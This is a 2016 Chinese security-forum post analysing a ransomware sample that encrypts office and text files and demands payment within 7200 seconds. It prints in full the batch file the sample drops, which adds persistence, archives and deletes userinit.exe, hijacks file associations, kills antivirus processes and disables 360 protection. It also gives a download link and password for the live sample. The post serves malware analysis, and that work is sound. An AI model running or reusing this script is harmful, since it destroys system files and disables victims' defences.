本帖最后由 china-loong 于 2016-1-22 14:40 编辑
软件打开以后释放文件 修改常用文件打开方式和图标 并加密所有办公格式软件(DOC PDF 表格文件)和TXT文档 并且用RC6加密方式加密 并且每一个加密文件的密码都不同 文件有7200秒时间付款购买 会给你一个序列号 点击复制会出来一行数字 这个数字是根据随机模式加密 一共有八种加密方式 随机1~8 然后复制一行数字以后再进行某种字节集加密方式加密 得出算法 所有密码保存在内存中 当关闭这个软件或者关机计算机 内存会得到释放 密码自然也没有了 释放出的BAT文件(不知道为什么作者要释放出BAT 为什么不直接加密成EXE文件以后再运行 ) [Asm] 纯文本查看 复制代码 copy %0 "%USERPROFILE%\「开始」菜单\程序\启动\" 复制自身到开机启动
copy %0 "C:\WINDOWS\file.exe" 复制自身到C盘WINDOWS
c:\rar.exe a -ad -k -s -ibck -p[user] "C:\user.rar" "C:\WINDOWS\system32\userinit.exe" 把文件userinit.exe加密
del C:\WINDOWS\system32\userinit.exe /s /f /q 把文件userinit.exe删除
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F 复制自身到开机启动
reg add "HKEY_CLASSES_ROOT\DLfile\DefaultIcon" /ve /t REG_EXPAND_SZ /f 创建文件注册表
reg add "HKEY_CLASSES_ROOT\DLfile\shell\open\command" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\DLfile\shell\print\command" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\nlsfile\DefaultIcon" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\nlsfile\shell\open\command" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\nlsfile\shell\print\command" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\nlsfile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg add "HKEY_CLASSES_ROOT\nlsfile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg add "HKEY_CLASSES_ROOT\nlsfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F 修改文件图标为“C:\WINDOWS\XM.ico”
reg add "HKEY_CLASSES_ROOT\DLfile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg add "HKEY_CLASSES_ROOT\DLfile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg add "HKEY_CLASSES_ROOT\DLfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F 修改文件图标为“C:\WINDOWS\XM.ico”
reg add "HKEY_CLASSES_ROOT\BMPfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\datfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\inifile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\OLDfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\TMPfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\PRXfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\inifile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg add "HKEY_CLASSES_ROOT\inifile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg add "HKEY_CLASSES_ROOT\scrfile\DefaultIcon" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\scrfile\shell\open\command" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\scrfile\shell\print\command" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\scrfile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F
reg add "HKEY_CLASSES_ROOT\scrfile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F
reg add "HKEY_CLASSES_ROOT\scrfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F
reg add "HKEY_CLASSES_ROOT\scffile\DefaultIcon" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\scffile\shell\open\command" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\scffile\shell\print\command" /ve /t REG_EXPAND_SZ /f
reg add "HKEY_CLASSES_ROOT\scffile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F
reg add "HKEY_CLASSES_ROOT\scffile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F
reg add "HKEY_CLASSES_ROOT\scffile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F
reg add "HKEY_CLASSES_ROOT\.lnk" /ve /d DLfile /t REG_SZ /F 修改文件注册表关联为DLfile
reg add "HKEY_CLASSES_ROOT\.reg" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.jpg" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.wav" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.mp4" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.com" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.avi" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.vod" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.rar" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.scf" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.xls" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.txt" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.zip" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.cmd" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.doc" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.dll" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.log" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.pdf" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.vbs" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.zip" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.rar" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.7z" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.nls" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.scr" /ve /d DLfile /t REG_SZ /F 同上
reg add "HKEY_CLASSES_ROOT\.scf" /ve /d DLfile /t REG_SZ /F 同上
taskkill /im Explorer.exe /f 结束桌面进程
ping -n 3 127.0.0.1 等待时间为3秒
explorer.exe 运行桌面进程(小重启 来刷新注册表服务加载项)
taskkill /f /im kavsvc.exe 结束进程
taskkill /f /im KVXP.kxp 结束进程
taskkill /f /im Rav.exe 结束进程
taskkill /f /im Ravmon.exe 结束进程
taskkill /f /im Mcshield.exe 结束进程
taskkill /f /im VsTskMgr.exe 结束进程
taskkill /f /im 360tray.exe 结束进程
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\ExecAccess\" /ve /d 0 /t REG_SZ /F
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\MonAccess" /ve /d 0 /t REG_SZ /F
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\SiteAccess" /ve /d 0 /t REG_SZ /F
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\UDiskAccess" /ve /d 0 /t REG_SZ /F
del %0 删除自身
火眼分析结果:http://fireeye.ijinshan.com/analyse.html?md5=5e3caa6eb2aa2237ff0a6eadfcba48fa&sha1=f89f6a47db7d04c07bbceac24d787f6bb33037e6&type=1#full 样本地址:链接: http://pan.baidu.com/s/1qWVrgoW 密码: b4yg 文件 Size: 993810 bytes File Version: 1.0.0.0 Modified: 2016年1月21日, 13:15:54 MD5: 6CE3A9B0BAD8B6BFE510D689FD4316C5 SHA1: 8E419C2603CF2DAF9B837ED7C514D2F0F195822A CRC32: DC397632
大家觉得要如何解决这种敲竹杠? | 
发表于 2016-1-22 11:40
|
发表于 2016-1-22 14:32
